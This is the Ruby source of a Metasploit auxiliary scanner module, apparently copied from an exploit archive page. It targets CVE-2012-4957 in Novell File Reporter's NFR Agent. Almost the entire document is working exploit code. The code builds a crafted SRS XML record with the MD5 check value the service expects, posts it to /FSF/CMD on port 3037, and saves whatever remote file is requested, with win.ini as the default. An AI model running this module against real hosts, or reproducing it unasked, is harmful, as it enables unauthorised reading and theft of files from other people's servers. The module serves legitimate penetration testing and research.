Share
## https://sploitus.com/exploit?id=PACKETSTORM:181031
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'NFR Agent SRS Record Arbitrary Remote File Access',
'Description' => %q{
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve
arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and
CMD 103, specifying a full pathname. This module has been tested successfully
against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File
Reporter 1.0.1).
},
'References' =>
[
[ 'CVE', '2012-4957' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/' ]
],
'Author' =>
[
'juan vazquez'
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Nov 16 2012"
)
register_options(
[
Opt::RPORT(3037),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini'])
])
register_autofilter_ports([ 3037 ])
end
def run_host(ip)
record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>"
md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase
message = md5 + record
print_status("Retrieving the file contents")
res = send_request_cgi(
{
'uri' => '/FSF/CMD',
'version' => '1.1',
'method' => 'POST',
'ctype' => "text/xml",
'data' => message
})
if res and res.code == 200 and not res.body =~ /<RESULT>/
loot = res.body
f = ::File.basename(datastore['RFILE'])
path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_good("#{datastore['RFILE']} saved in #{path}")
else
print_error("Failed to retrieve the file contents")
end
end
end